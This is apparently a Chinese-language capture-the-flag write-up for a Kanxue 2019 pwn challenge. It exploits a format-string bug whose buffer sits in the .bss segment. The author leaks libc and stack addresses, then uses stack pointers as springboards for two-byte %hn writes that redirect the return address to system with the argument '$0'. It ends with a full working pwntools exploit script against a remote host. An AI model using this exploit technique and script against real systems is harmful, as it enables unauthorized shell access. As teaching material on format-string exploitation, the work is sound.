格式化字符串在bss段上的处理
格式化字符串在bss段上的内容处理
先查看程序保护,保护全开
拿到程序一眼就看到了格式化字符串的漏洞
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v3; // eax
char buf; // [esp+0h] [ebp-10h]
unsigned int v6; // [esp+4h] [ebp-Ch]
int *v7; // [esp+8h] [ebp-8h]
v7 = &argc;
v6 = __readgsdword(0x14u);
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
puts("Welcome to kanxue 2019, your pwn like cxk");
do
{
while ( 1 )
{
menu();
read(0, &buf, 4u);
v3 = atoi(&buf);
if ( v3 != 1 )
break;
printf("What do tou want to say:");
read_input((int)&echo, 0x18);
printf((const char *)&echo);
puts((const char *)&unk_A97);
}
}
while ( v3 != 2 );
return 0;
}
一眼看到了格式化字符串,由于开了RELOD保护无法改变got表内容的值,只好对其栈上的返回地址进行劫持,并且设置返回地址的参数。
但是由于是栈劫持必须要对栈进行写入。但是格式化字符串的东西不存储在栈中,其中意味着不能对其进行直接写入。使用前面输入的那个进行任意地址写。于是上网百度查了一波发现:
很多出题人把格式化串放到堆或是bss段中,这样你就不能像传统的那样去读取格式化串中的目标地址了,不在栈中你是不可能读到的。对于这种题目的做法就是要进行两次漏洞利用,第一次在栈中构造跳板。第二次利用跳板去进行任意地址写。具体的说就是:第一次:在栈中找一个指向栈里面的指针(这种指针肯定会有,因为堆栈框架就是这样的),往这个栈的地方写入第二次要写入的地址。第二次:就跟正常利用一样了,
于是我们便要寻找跳板。不过在这之前我们先要泄露一些信息,比如动态链接库的地址,栈的地址。
在格式化字符串处下断点查看栈的偏移
payload=%11$p泄露__libc_start_main+247的地址,可以拿到libc版本
payload=%8$p泄露栈的地址
拿到栈的地址后根据计算就可以拿到返回地址(0xffffd01c)和参数的地址(0xffffd024)。接着开始往返回地址写入值了,
一开始随便选了一个跳板写入发现%n写入不了,问了师傅,师傅告诉我每次只能写入两个字节,跳板内要写函数的返回地址,发现偏移为5处的跳板(0xffffd0b4)的值(0xffffb28a)前两个字节与返回地址相同,可以利用其只写入后两个字节,这样跳板内的地址变为返回地址,而跳板的地址(0xffffd0b4)的偏移为0x35(53)。我们便可以向偏移53处(即返回地址)写入system的地址的后两个字节。
之后高两个字节将返回地址+2之后,再进行写入到偏移53处再写入sysytem的前两个字节
这样返回地址就成功劫持了,之后再写入参数的地址写入/bin/sh的地址。这样本地就能拿到权限了
但是给我们的libc里面没有/bin/sh字符串。。只有靠我们自己写入/bin/sh。再栈上直接写入,由于/bin/sh太长了 直接写入$0亦可开启shell,参数的地址就定在偏移8的地址(0xffffd020)向其写入0xffffd020即可。
最后payload如下
from pwn import *
context.log_level='debug'
#p=process('./format')
p=remote('152.136.18.34','9999')
def format(payload):
p.recvuntil('Choice:')
p.sendline('1')
p.recvuntil('say:')
p.send(str(payload))
#leak the libc_main+247
payload='%11$p'
format(payload)
libc_start_main_247=p.recv(10)
libc_start_main=int(libc_start_main_247,16)-247
print hex(libc_start_main)
##leak the stack
payload='%8$p'
format(payload)
stack=p.recv(10)
stack_addr=int(stack,16)
print hex(stack_addr)
payload='%'+'12324'+'c'+'%8$hn'##write $0
format(payload)
libc_base=libc_start_main-0x18540
system_addr=libc_base+0x3a940
#gdb.attach(p)
#pause()
str_bin_sh=stack_addr
#system_addr=libc_start_main+0x22860
#str_bin_sh=libc_start_main+0x1434cb
print 'system'
print hex(system_addr)
retn_addr=stack_addr-4
parment_addr=stack_addr+4
retn_addr_1=retn_addr+2
parment_addr_1=stack_addr+6
#change retn
##lowb
#gdb.attach(p)
payload='%'+str(retn_addr&0xffff)+'c'+'%5$hn'
format(payload)
payload='%'+str(system_addr&0xffff)+'c'+'%53$hn'
format(payload)
print 'retn low finish'
print hex(system_addr)
#high b
payload='%'+str(retn_addr_1&0xffff)+'c'+'%5$hn'
format(payload)
payload='%'+str(system_addr>>16)+'c'+'%53$hn'
format(payload)
print 'retn high finish'
#change parment
payload='%'+str(parment_addr&0xffff)+'c'+'%5$hn'
format(payload)
payload='%'+str(str_bin_sh&0xffff)+'c'+'%53$hn'
format(payload)
print 'parment high finish'
payload='%'+str(parment_addr_1&0xffff)+'c'+'%5$hn'
format(payload)
payload='%'+str(str_bin_sh>>16)+'c'+'%53$hn'
format(payload)
print 'all finish'
p.recvuntil('Choice:')
p.sendline('2')
p.interactive()